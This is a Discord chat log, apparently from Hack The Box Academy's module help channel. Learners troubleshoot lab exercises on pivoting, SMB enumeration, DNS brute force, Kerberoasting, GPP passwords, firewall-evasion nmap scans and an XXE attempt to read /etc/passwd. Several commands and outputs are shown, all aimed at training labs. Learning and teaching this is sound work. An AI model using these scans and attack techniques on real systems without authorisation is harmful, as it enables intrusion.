
nah still

Where are you getting the .150 ip from?

#modules message

ipconfig in pivot

172.16.5.150

@fathom pendant finally got it. Thank you again for being a tremendous help.

Ipconfig shows the localhost ips

But that's not how the netsh forward works lol

You're forwarding the request to the next step in the chain

You need the target ip, in this case 172.16.5.19 as indicated by the question to be forwarded to

Had to double check the netsh command: but yeah the command takes the listening port, and forwards it to the specified port and specified system

damn i need to stop these 2:30 AM sessions xD

yeah got it working thanks

Via the connectport and connectaddress args

:p

these windows commands annoy me, linux commands are so much cleaner imo

Eh at least you clearly understand what the windows args are

*in most cases

Psst. You should checkout ronin-exploits. Much simpler/cleaner syntax for writing exploits than MSF.

Did you just search the server for mentions of ruby so you can respond to a message from yesterday to shill your tool in an academy module discussion channel

Hey everyone I'm new to cyber security

In fact I'm new to almost everything

Can I get some help ?

this isnt an introduction channel

read #welcome

Doesn't really matter I was just wondering if anyone here can help me at my first steps

It does matter

your first steps is reading #welcome

That exactly what I'm saying

Read what ?

I linked it twice

Reading comprehension is an invaluable skill

#welcome

click on it

Maybe third time's the charm

Damn 😅
Anyways thank

New to discord and the internet in general it seems

Dec 22 2023 account

But wow, that was really something

@thorn urchin dum question
My english isn't my first language soo it's pretty bad
Is there anyway I can change the language or smtn ?

nope its an English only server unfortunately

If you mean of Discord itself, check the settings, you can definitely change it

Forget about it
Another question
Is it safe ? Like no virus ? No one trying to hurt me (I literally have nothing) ?

Just wondering

This server is English only. Please read #welcome and #rules to get familiar and please use the proper channels to discuss. This is not the proper channel for such discussion 🙂 @rustic sage

THANKS!!!

its a public server so no promises on that. But if you do see something suspicious, feel free to report it

Alr I guess that all I need for now

See y'all very soon

Hello All! Im stuck on following question for "Password Attacks" module:

" Find the user for the SMB service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer."

I'm able to sign in to smb with username and password but none of the commands work for me to find the flag.txt?

Smb is a windows protocol

So dir and type are gonna be your friends for enumerating

I have tried both but it seems not to work

Getting this error:
NT_STATUS_ACCESS_DENIED listing *

Then that user can't access smb shares

Guys!! Is there any other webs sites that teach hacking expect hackthebox ?

Tryhackme is good for beginners

I know about it gimme another one

Root-me

PicoCTF

pwnable.kr

Offsec Labs ig

It worked, I was under wrong user which did not have right credentials to use commands.

Thanks for the tip!

This really isn't the chat to discuss other platforms either there is a general chat if you can figure out how to read and follow instructions in #welcome @rustic sage

Hi guys,
I retrieved something that contains community string using onesixtyone but am not sure which portion is th actual community string and which portion is not.

/usr/bin/onesixtyone -c /usr/share/wordlists/seclists/Discovery/SNMP/snmp-onesixtyone.txt $target

Trying to complete the rpivot module and I get an error messag when trying the command shown

in the square brackets []

tysm!

Hackers , i bought a new acer laptop. It has Nvidia GTX. I was wondering how well Kali /parrot run on Nvidia ? Would love to hear from you guys

Should I use a VM or install it on bare metal?

always use a VM

What does the CWEE cert stand for?

CWEE, Certified Web Exploitation Expert

Probably

thanks

We won't know for sure until it's released

This one isn't working

It's hanging at the webpage

This is the output of the proxychains command

Hey I just finished reading #welcome and #rules

Who are these

Congrats but you didn't follow the instructions in them

What ?

There's instructions at the bottom of #welcome to access more of the server

I'm assuming I don't need to do anything with this because there are no creds supplied for NTLM

You need an account on https://app.hackthebox.com

It has an app ?

No, app is just the subdomain for the main site

i got it. thanks! it took me a while :/

I guess that's enough for today

See y'all tomorrow

Disregard proxychains issue in my rpivot post, moved to erratum

stuck in footprinting-hard lab. I retrieved the private ssh key from pop3 and retreived the dovecot-uidlist which doesn't seem too interseting. Where do I go from now? I made it to this point without a solid comprehension about the scenario given. Can anyone give me a nudge?

dovecot is nothing, you got an ssh key though, look who that's for from the email

bob?

Perhaps

But read the email, and who it's for

proxychains4 doesnt work for the rpivot issue either

"proxychains curl 172.16.5.135:80" works though

just gives the source code, but it's easy to find the flag

I cant find the account authenticator on the home screen of my account

can i dm anyone for help?

does PS Remoting work in a reverse shell

Well it won't be on the "home screen", are you looking at academy or labs

academy

There isn't one for academy

oh

It's only on the main platform

(Which is a separate logon for now, until they implement sso)

when i click on to sign in, it gives the 4 options so I chose academy since I have only made an account for that

right.. so when i click login should I click on labs instead?

https://app.hackthebox.com

Yes

and i should mak ea new account like you mentione dabove

Yes, your academy login won't work for main

can i reuse my email for both>?

Yes

along with same username

Yes as long as it's not taken on the main site

alright sounds good, thank you so much

sorry for th barrage of questions, i just joined htb and am learning to navigate through all the materials

I'm stuck on this as well. Let me know if you figure it out. I have everything but the just get access denied when I try to list \dc01\c$

did you ever figure this out? I'm stuck there also

Doing footprinting module rn and on the DNS brute force question trying to find host with octet 203. I am just doing the bash oneliner brute force with dig $sub.inlanefreight.htb @[NS ip]. Is it really just my wordlist or is my query messed up

your query and wordlist is messed up

shoot lol

I see that the mail1 name server starts with 201. Is the A record for 203 on there? I'm not able to zone transfer anything from it

I guess I assumed that 203 was a name server that was just under a different zone

Seems like I'm not the only one with the firefox proxychains issue. Did some digging on the history and found a couple of posts

I searched "proxychains firefox-esr 172.16.5.135:80" on the discord and found some results with no clear resolution besides just using curl

use the tool dnsenum with the fierce wordlist from seclists

This is my exact query dnsenum --dnsserver 10.129.133.80 --enum -p 0 -s 0 -f /usr/share/seclists/SecLists-master/Discovery/DNS/fierce-hostlist.txt inlanefreight.htb, you got something with this?

try with each of the subdomains from your zone transfer result

Ah, okay. Thanks

Why am I able to query FQDNs of machines inside of the dev subdomain but not the mail1 subdomain, for example? I did a zone transfer for the inlanefreight.htb zone and don't see a NS record for dev.inlanefreight.htb. Does it exist on the name server, but is just in a different zone?

Because it's not configured to allow it, is the short of it

It's also not in that dns zone to allow (if I'm remembering zones right for dns, which I'm probably not)

mail1 is presumably a mail server, i.e. a host, while dev is a separate DNS zone.
The name server responsible for dev is declared in the zone file.

I’m trying to deauth my network with aireplay using 2 adapters. I’m not sure why it’s not working? Any advice please

#rules

is it really yours

This isn't the place to ask for assistance with this

Hey at WINDOWS ATTACKS & DEFENSE \ Kerberoasting
I did the attack and the second question wants me to find it from events which is event id 4769 there is not a sign of any logs

Have you logged in to the DC? You need to look at the logs from the DC, not those from the client.

yeah i did rdp as the user given to me

Then carry out the attack again. You should see the entries in the log

alright ill do one more time lets see

i should just rdp to DC1 right?

what does " What is the path to the htb-student's mail?" mean

I can't find any directories that are called "mail"

Yeah, read the logfiles there

||environment variables||

didn't realize mail was in env

my bad

hi guys whats goin on ?

this isn't a gen chat - read #welcome and follow instructions to gain access to more of the server

how much does it coast to get CWEE modules?

still the same i did it 4 times and even changed the machine

god i hate logs and defensive

I read in the forums that there is a bit of an technical issue ... some people used the admin hash from previous exercise but even trying that didnt work ... still stuck on it though

#modules message check this message

Only calculation that needs to be modified is that, the price of the advanced cert is not 210$ but it's 318$. That's 108$ more value to the gold annual.

bruh all the time it had space in the front

it does not let me import or do anything

get GPPPassword does not output anythinh

It's a modular script.

Get-GPPPassword

not .\Get-GPPPassword

yeah also the user Exec policy didnt allow it so i changed to htb user

i did modify it but still didnt work but htb-student fixed it

Thanks tho ❤️

The knowledge from CPTS certainly helped me a lot with the attacks.

yeah i am currently doing assignment but after I get my sec+ in jan ill start studing for CPTS

I hove hands on certs more that exams and CPTS OSCP both are good

i just hate windows machines

i can finish linux blind but windows got i hate it

I have not done OSCP and therefore cannot judge it.
If you know the attacks described in the CDSA modules from OSCP, that helps just as much as if you know them from CPTS.
It doesn't really matter where you know them from. But it helps a lot to know the attacks

CDSA is almost only Windows

yeah fs when i study for CPTS ill take notes and stuff currently im getting basics of each tool to survive

when performing a SSH in HTB academy which password is required when prompted to enter the password?

it should tell you

make sure your vpn is on

Ok. So i tried to read /etc/passwd with xxe payload. i discovered that image/svg+xml content type is allowed by server and .svg extension but i need to have a jpg file signature to make it work

But server is returning the same thing i gave to it but in img tag

Why is it that I'm getting a different result from someone that perform the same Nmap scan as me?

I'm doing the firewalls evasion medium lab and I've been stuck on it for 2 days now and decided to look up the the answer. I type the exact command they do the scan went through but I still have no domain.

The question was to determine the domain that is on port 53.
Nmap --script discovery <ip> -T4
I tried all the -T combinations (0 to5) still no domain. 😡🤬

There's really no need to cross-post, the -T will make zero difference to the results, it's just for the speed of the scan, this definitely doesn't look like what I did for that lab, but I don't have my notes in front me, there's so many options Nmap has and you're using almost none of them

didn't the question ask for dns server version? not sure why you're trying to get the domain. use one of the nmap dns scripts

That was just an explample of what the dude on yt did and he got it right with namp --script discovery -T4 but when I do the same thing after trying so many different other combo . Still not working

It just doesn't make sense for what the question is asking if it really is the DNS server version like Xre0uS said

I also remember I had to do one of those labs in the Pwnbox, it wasn't working from my VM

yep need pwnbox for this one

i discovered where was issue

now its working

Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \DC01\julio.

I found the DNS server version from NETWORK ENUMERATION WITH NMAP - Medium Lab , but seems to be not correct. Is here any other way?

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sSU -p 53 -D RND: 5 -g 53 --script dns-nsid 10.129.55.216 -Pn
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-23 06:53 EST
Nmap scan report for 5 (0.0.0.5)
Host is up (0.0055s latency).

PORT STATE SERVICE
53/tcp filtered domain
53/udp open domain
| dns-nsid:
|_ bind.version: 9.11.4-P2-RedHat-9.11.4-26.P2.el7_9.9

use pwnbox

Thnx bro, it worked without using the script

hello, i'm stuck in "password attacks" " network services", i found the user for the smb connexion but when i am connected i can't ls or dir, to find the flag. i have this error "NT_STATUS_ACCESS_DENIED listing *
"

if you get that means the user does not have rights to read the smb share, try another user/protocol/share

ok thanks, i found it

yo

anyone could help with WINDOWS EVENT LOGS & FINDING EVI

cuz i read it 4 times and didnt understand

What exactly don't you understand?

I'm trying the Web Attacks Skills Assessment, and I am having a lot of difficulty reseting admin password, I keep getting an invalid token. I tried looking at source code to see where the token is generated from but I can't find anything

Think about what you learned in the module.. all topics play their role in this assessment.. Sometimes the change of a single word might do the trick

I hope this little hint helps if I am not wrongly remembering this assessment

hey i got a quick question for a chal i gotta rdp from my own to kali then rdp from kali to windows on local network but when i use xfreerdp it cant resolve the local name which is WS001

hello

What module is this?

Windows Attack and defence - PKI - ESC1

anybody knows how to hack

no clue whats that

Haven't done the module in question, but have you added the IP to /etc/hosts?

then whats hack the box

that does not have any ip

jk what do you need

i want to learn hacking

It can't not have an IP if it's a host you can RDP into

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

i didnt get that much but would adding it to etc/hosts solve?

ty

yes it links a hostname i.e. ws01 to an IP

u guys know how to hack

a pc

no

ok

┌──(root㉿kali)-[/home/kali]
└─# echo "WS001 10.10.10.10" > /etc/hosts

┌──(root㉿kali)-[/home/kali]
└─# su kali
┌──(kali㉿kali)-[~]
└─$ xfreerdp /u:bob /p:[PASS] /v:10.10.10.10 /dynamic-resolution
[09:24:41:120] [4738:4739] [ERROR][com.freerdp.core] - freerdp_tcp_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_FAILED [0x00020006]
[09:24:41:120] [4738:4739] [ERROR][com.freerdp.core] - failed to connect to 10.10.10.10

I suggest you read the #rules, if you want to learn ethical hacking, you're in the right place, if you want someone to hack your ex or something equally dumb, get out

bro you just overwrote your /etc/hosts

its htb machine its ok

> and >> are two different things

i want to learn ethical hacking

yup gotta keep in mind lol

anyways if you're gonna specify an IP you don't need to add to /etc/hosts, in this case make sure your target is the IP specified, it seems like that host doesn't exist

Then the article on getting started should help, then you can get on HackTheBox Academy

ok

yeah that was my problem the hostname is given without ip and it is not resolved

Maybe we're missing some context not having done the module, and you're meant to connect a different way, though RDP into it sounds pretty clear to me

Where did you pull the 10.10.10.10 IP from?

random

Then how would that work

idk im desperate to any idea

i even can send the html if you cant access it but i dont see anything else

no ip no a way to connect thats shown just the question is there

Ws001 is 172.16.18.25

The second section of the module has the lab ips listed

yuppp worked thanks

Ah, so just a reading issue lol

probly

it was at diff section

Anything mentioned/found in a module section can and often is relevant later, that can be hostnames, IPs, usernames, passwords

alright thanks guys

no problem

Nice to see theres a terminate machine button now 😅

On Intro to Assembly, Skill Assessment Task 2, I finally have my code within the required specifications but am still receiving a failed to run shellcode error. I'm not sure if it's the code itself, or the manner in which I am trying to send it, but anyone around to lend a hand??